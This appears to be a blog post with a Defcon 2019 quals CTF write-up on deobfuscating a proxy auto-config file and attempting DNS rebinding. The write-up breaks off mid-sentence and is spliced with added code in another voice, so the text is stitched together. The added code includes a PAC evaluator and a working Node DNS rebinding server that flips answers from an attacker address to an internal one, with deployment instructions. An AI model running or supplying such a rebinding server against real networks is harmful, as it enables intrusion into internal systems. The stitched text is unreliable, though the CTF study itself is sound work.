Showing posts from June, 2019

Defcon CTF quals 2019 : ooops

Category: Web
Points: 137
Solves: 34

## Description

```
On our corporate network, the only overflow is the Order of the Overflow.
```

Attachment: [info.pac](https://s3.us-east-2.amazonaws.com/oooverflow-challs/b48fb18a0837e8e6840d5101ff44bb9ee5ee1d22846580487ccce756b966f6b2/info.pac)

## Write-up

### 1. JavaScript deobfuscation

`info.pac` is an obfuscated proxy auto-config script that builds the real code as a string and hands it to `eval`. Changing that `eval` to `console.log` prints the decoded script instead of executing it:

```js
FindProxyForURL = function(url, host) {
  /* The only 'overflow' that employees can access is the Order of the Overflow.
     Log in with OnlyOne:Overflow. HTTPS support is coming soon. */
  if (shExpMatch(host, 'oooverflow.io')) return 'DIRECT';
  return 'PROXY ooops.quals2019.oooverflow.io:8080';
}
```

The comment gives the proxy address (`ooops.quals2019.oooverflow.io:8080`) and the login `OnlyOne:Overflow`, so we can reach the challenge page.

### 2. DNS rebinding

If you submit a URL, the bot visits it. Looking at the `Referer` header of the bot's request shows that it comes from a page on an internal IP address (e.g. 10.x.x.x). I tried DNS rebinding. I could not access the internal
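To check what the rule recovered in step 1 actually does, here is an added example (my own code, not part of the original write-up or of the challenge files). It applies the "change `eval` to `console.log`" trick in code by capturing the decoded script instead of printing it, re-implements `shExpMatch` in the style of Firefox's PAC helper, and resolves a few URLs through the challenge rule. The obfuscated input is a constructed stand-in (a `String.fromCharCode` wrapper around the deobfuscated rule); the real encoding of `info.pac` is not reproduced.

```javascript
'use strict';

// The deobfuscated PAC rule exactly as recovered in step 1 of the write-up.
const DEOBFUSCATED_PAC = `
FindProxyForURL = function(url, host) {
  /* The only 'overflow' that employees can access is the Order of the Overflow.
     Log in with OnlyOne:Overflow. HTTPS support is coming soon. */
  if (shExpMatch(host, 'oooverflow.io')) return 'DIRECT';
  return 'PROXY ooops.quals2019.oooverflow.io:8080';
}`;

// Constructed stand-in for the obfuscated info.pac: only the
// eval(<decoder expression>) shape is reproduced, not the real encoding.
const OBFUSCATED_PAC =
  'eval(String.fromCharCode(' +
  Array.from(DEOBFUSCATED_PAC, (c) => c.charCodeAt(0)).join(',') +
  '))';

// The write-up's trick done in code: rewrite every eval( call into a capture
// function, so the decoder expression still runs but the decoded script is
// returned as text instead of being executed. Wrappers that stack several
// eval layers need this repeated on the result.
function captureEval(src) {
  const captured = [];
  const rewritten = src.replace(/\beval\s*\(/g, '__capture(');
  new Function('__capture', rewritten)((code) => {
    captured.push(String(code));
    return code;
  });
  return captured.join('\n');
}

// PAC's shExpMatch(): '*' matches any run of characters, '?' exactly one,
// everything else is literal, and the match covers the whole string. Modelled
// on the helper in Firefox's PAC sandbox, with regex metacharacters escaped.
function shExpMatch(str, pattern) {
  const re = pattern
    .replace(/[.+^${}()|[\]\\]/g, '\\$&')
    .replace(/\*/g, '.*')
    .replace(/\?/g, '.');
  return new RegExp('^' + re + '$').test(str);
}

// Compile a PAC script with the helper in scope and hand back FindProxyForURL.
// The leading `var` keeps a `FindProxyForURL = function ...` assignment local
// instead of leaking it onto the global object.
function loadPac(pacSource) {
  const body = 'var FindProxyForURL;\n' + pacSource + '\n;return FindProxyForURL;';
  return new Function('shExpMatch', body)(shExpMatch);
}

const findProxyForURL = loadPac(captureEval(OBFUSCATED_PAC));

// Resolve a URL the way a browser would: pass both the URL and its hostname.
function proxyFor(url) {
  return findProxyForURL(url, new URL(url).hostname);
}

for (const url of ['http://oooverflow.io/', 'http://www.oooverflow.io/', 'http://10.0.0.5/']) {
  console.log(url, '->', proxyFor(url));
}
```

Two things worth noticing: the pattern has no wildcard, so only the bare host `oooverflow.io` goes `DIRECT` and every other host, a `10.x.x.x` address included, is sent to the proxy; and with an explicit `PROXY` directive the browser hands the full URL to the proxy, so it is the proxy, not the client, that resolves the destination name and opens the connection.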
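For reference on what step 2 is attempting, an added example of the mechanism behind DNS rebinding (my own illustration, not code from the write-up and not the author's infrastructure): a resolver that answers the first lookup of an attacker-controlled name with the attacker's address and every later lookup with an internal address, plus the wire encoding of the A-record answers so the file can actually serve UDP queries. The name `rebind.attacker.example` and the addresses `203.0.113.10` and `10.0.0.5` are placeholders.

```javascript
'use strict';

const REBIND_NAME = 'rebind.attacker.example';   // placeholder, attacker-controlled name
const ATTACKER_IP = '203.0.113.10';              // placeholder (documentation range)
const TARGET_IP = '10.0.0.5';                    // placeholder internal address

// First lookup: the attacker host, so the victim loads the attacker's page
// under this origin. Later lookups: the internal target, so the page's
// same-origin requests now reach the internal host. TTL 0 asks clients not
// to cache the first answer.
class RebindingResolver {
  constructor(name, attackerIp, targetIp) {
    this.name = name.toLowerCase();
    this.attackerIp = attackerIp;
    this.targetIp = targetIp;
    this.lookups = 0;
  }
  answerFor(name) {
    if (name.toLowerCase() !== this.name) return null;   // not our name: refuse
    this.lookups += 1;
    return this.lookups === 1 ? this.attackerIp : this.targetIp;
  }
}

// Read the QNAME labels of the first question; returns the name and the
// offset just past its terminating zero byte.
function parseQuestionName(msg, offset = 12) {
  const labels = [];
  let pos = offset;
  while (msg[pos] !== 0) {
    const len = msg[pos];
    labels.push(msg.toString('ascii', pos + 1, pos + 1 + len));
    pos += 1 + len;
  }
  return { name: labels.join('.'), end: pos + 1 };
}

function encodeName(name) {
  const parts = [];
  for (const label of name.split('.')) {
    parts.push(Buffer.from([label.length]), Buffer.from(label, 'ascii'));
  }
  parts.push(Buffer.from([0]));
  return Buffer.concat(parts);
}

// Standard A query with RD set; used here to construct test traffic.
function buildQuery(id, name) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x0100, 2);                 // RD=1
  header.writeUInt16BE(1, 4);                      // QDCOUNT
  return Buffer.concat([header, encodeName(name), Buffer.from([0, 1, 0, 1])]); // A, IN
}

// Response to `query`: echo the question and add one A record with the given
// TTL; with ip === null answer REFUSED with no records.
function buildResponse(query, ip, ttl) {
  const { end } = parseQuestionName(query);
  const header = Buffer.alloc(12);
  query.copy(header, 0, 0, 2);                     // same transaction ID
  header.writeUInt16BE(ip ? 0x8180 : 0x8185, 2);  // QR,RD,RA + NOERROR / REFUSED
  header.writeUInt16BE(1, 4);                      // QDCOUNT
  header.writeUInt16BE(ip ? 1 : 0, 6);             // ANCOUNT
  const question = query.subarray(12, end + 4);
  if (!ip) return Buffer.concat([header, question]);
  const answer = Buffer.alloc(16);
  answer.writeUInt16BE(0xc00c, 0);                 // pointer to QNAME at offset 12
  answer.writeUInt16BE(1, 2);                      // TYPE A
  answer.writeUInt16BE(1, 4);                      // CLASS IN
  answer.writeUInt32BE(ttl, 6);
  answer.writeUInt16BE(4, 10);                     // RDLENGTH
  Buffer.from(ip.split('.').map(Number)).copy(answer, 12);
  return Buffer.concat([header, question, answer]);
}

// Decode the address and TTL of the single A record in a response built above.
function parseAnswer(resp) {
  const { end } = parseQuestionName(resp);
  if (resp.readUInt16BE(6) === 0) return null;
  const a = end + 4;                               // answer starts after QTYPE/QCLASS
  return { ttl: resp.readUInt32BE(a + 6), ip: Array.from(resp.subarray(a + 12, a + 16)).join('.') };
}

// Minimal UDP front end; started only with `node rebind.js --serve`.
function serve(resolver, port) {
  const dgram = require('dgram');
  const sock = dgram.createSocket('udp4');
  sock.on('message', (msg, rinfo) => {
    const { name } = parseQuestionName(msg);
    sock.send(buildResponse(msg, resolver.answerFor(name), 0), rinfo.port, rinfo.address);
  });
  sock.bind(port);
  return sock;
}

if (process.argv.includes('--serve')) {
  serve(new RebindingResolver(REBIND_NAME, ATTACKER_IP, TARGET_IP), 5353);
}
```

To use it for real the NS record of the rebinding name has to point at the host running `--serve`, and the attacker page re-requests its own origin once the TTL-0 answer has expired. One caveat that matters for this challenge: a client that a PAC rule sends to an explicit HTTP proxy does not resolve the destination host itself; the proxy does, so the flipped answers would have to be observed by whichever resolver the proxy uses.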